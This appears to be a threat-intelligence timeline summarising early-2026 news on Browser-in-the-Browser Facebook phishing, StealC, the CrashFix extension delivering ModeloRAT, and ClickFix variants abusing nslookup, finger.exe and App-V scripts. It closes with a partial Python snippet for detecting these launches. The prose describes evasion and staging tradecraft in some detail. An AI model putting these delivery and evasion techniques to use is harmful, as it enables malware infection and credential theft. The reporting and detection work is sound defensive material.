The key shift lies in the abuse of trusted infrastructure, utilizing legitimate cloud hosting services like Netlify and Vercel, and URL shorteners to bypass traditional security filters and lend a false sense of security to phishing pages.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Most critically, the emergence of the Browser-in-the-Browser (BitB) technique represents a major escalation. By creating a custom-built, fake login pop-up window within the victim's browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Cybercriminals are increasingly using the browser-in-the-browser (BitB) attack technique to steal Facebook login credentials.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Phishing emails lure users with messages claiming copyright infringement, unauthorized login attempts, or account shutdown due to suspicious activity.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Attackers use shortened URLs to make phishing links appear more legitimate.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The BitB attack involves a fake browser pop-up window that mimics the real Facebook login page, including the real Facebook login page URL hardcoded into the authentication window.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Attackers deploy a fake CAPTCHA window before the login page to increase the appearance of legitimacy.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Phishing pages ask for personal information such as name, email address, phone number, and date of birth before requesting password confirmation.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attacks aim to steal sensitive personal information, usernames, and passwords for further fraud.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Trellix recommends applying two-factor authentication (2FA) to block account takeovers even if credentials are stolen.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Users are advised to treat unexpected requests with suspicion and log in directly via Facebook's official website instead of following unfamiliar links.
First reported: 13.01.2026 16:40 · 2 sources, 2 articles
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
StealC malware operators used a web-based control panel vulnerable to cross-site scripting (XSS) attacks.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Researchers exploited the XSS vulnerability to gather system fingerprints, monitor active sessions, and steal cookies from the StealC control panel.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
StealC malware has been distributed via YouTube as part of a campaign known as the YouTube Ghost Network.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
StealC malware has been updated to include Telegram bot integration for notifications, enhanced payload delivery, and a redesigned panel, codenamed StealC V2.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The source code for the StealC administration panel was leaked, providing insights into the threat actor's operations.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A StealC customer named YouTubeTA used Google's video-sharing platform to distribute the stealer by advertising cracked versions of Adobe Photoshop and Adobe After Effects.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
YouTubeTA amassed over 5,000 logs containing 390,000 stolen passwords and more than 30 million stolen cookies.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
YouTubeTA is suspected of seizing control of legitimate YouTube accounts to promote cracked software.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
YouTubeTA used ClickFix-like fake CAPTCHA lures to distribute StealC, indicating a broader infection method beyond YouTube.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The StealC panel allows operators to create multiple users and differentiate between admin users and regular users.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
YouTubeTA operated from an Eastern European country where Russian is commonly spoken, using an Apple M3 processor-based machine.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
An operational security blunder revealed YouTubeTA's real IP address, associated with a Ukrainian provider called TRK Cable TV.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The StealC developers exhibited weaknesses in cookie security and panel code quality, allowing researchers to gather data about their customers.
First reported: 19.01.2026 08:53 · 1 source, 2 articles
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The CrashFix command employs the legitimate Windows utility finger.exe to retrieve and execute the next-stage payload from the attacker's server.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
For domain-joined machines, the campaign deploys ModeloRAT, a fully featured Python-based Windows RAT that uses RC4 encryption for C2 communications.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
ModeloRAT sets up persistence using the Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration.
First reported: 19.01.2026 11:09 · 2 sources, 3 articles
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The NexShield extension creates a denial-of-service (DoS) condition in the browser by creating 'chrome.runtime' port connections in an infinite loop and exhausting its memory resources.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The NexShield extension displays a deceptive pop-up that shows a fake warning and suggests scanning the system to locate the problem.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The 'fixing' command is a chain that triggers an obfuscated PowerShell script via a remote connection, which downloads and executes a malicious script.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The payload has a 60-minute execution delay after installing NexShield to dissociate the extension from the malicious activity and evade detection.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
For domain-joined hosts specific to corporate environments, the threat actor delivers ModeloRAT, which can perform system reconnaissance, execute PowerShell commands, modify the Registry, introduce additional payloads, and update itself.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
For non-domain hosts, which are normally home users, the command and control server returned a "TEST PAYLOAD!!!!" message, indicating either low priority or work in progress.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The researchers provide a proper technical report on the entire CrashFix attack and the payloads delivered this way. They detail the multiple stages of the infection chain and ModeloRAT's capabilities, from establishing persistence and collecting reconnaissance info to executing commands, fingerprinting systems, and determining its privileges on the compromised system.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions only from trusted publishers or sources should keep you safe from CrashFix attacks or other threats.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts.
First reported: 20.01.2026 00:49 · 2 sources, 2 articles
- Fake ad blocker extension crashes the browser for ClickFix attacks — www.bleepingcomputer.com — 20.01.2026 00:49
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command on the Windows Run dialog.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The obfuscated loader runs checks to ensure that it's not run within sandboxed environments.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The resulting script is decrypted, GZip decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign targets enterprise-managed systems, as App-V, the application virtualization solution whose script it abuses, is built only into Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that's not a legitimate service.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.
First reported: 27.01.2026 16:38 · 1 source, 1 article
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The new DNS-based ClickFix variant uses the `nslookup` command to execute a custom DNS lookup via the Windows Run dialog, retrieving the next-stage payload from a hard-coded external DNS server rather than the system's default resolver.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
The DNS response containing the `Name:` field is extracted and executed as the second-stage payload, using DNS as a lightweight staging or signaling channel to blend malicious activity into normal network traffic.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
The attack chain downloads a ZIP archive from the domain `azwsappdev[.]com`, extracts a malicious Python script, and executes it to conduct reconnaissance, run discovery commands, and drop a VBScript that launches ModeloRAT.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Persistence is established by creating an LNK file in the Windows Startup folder, pointing to the VBScript to automatically launch ModeloRAT on system startup.
First reported: 15.02.2026 16:10 · 1 source, 1 article
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
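Defender-side detection for the Run-dialog LOLBin patterns this timeline describes (nslookup against a hard-coded external resolver, wscript.exe running SyncAppvPublishingServer.vbs, finger.exe as a download cradle), as an added example that is not code from the page or its sources. It assumes process-creation telemetry in a Sysmon Event ID 1-like shape; the approved-resolver list and the sample events are constructed placeholders.

```python
"""Detection logic for ClickFix-style LOLBin launches from process-creation telemetry.
Added example, not code from the page's sources. Assumes Sysmon Event ID 1-like
fields (image, parent image, command line); APPROVED_RESOLVERS and every sample
event below are constructed placeholders, not captures from a real host.
"""
import re
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str

# Commands typed into the Win+R Run dialog are spawned by explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
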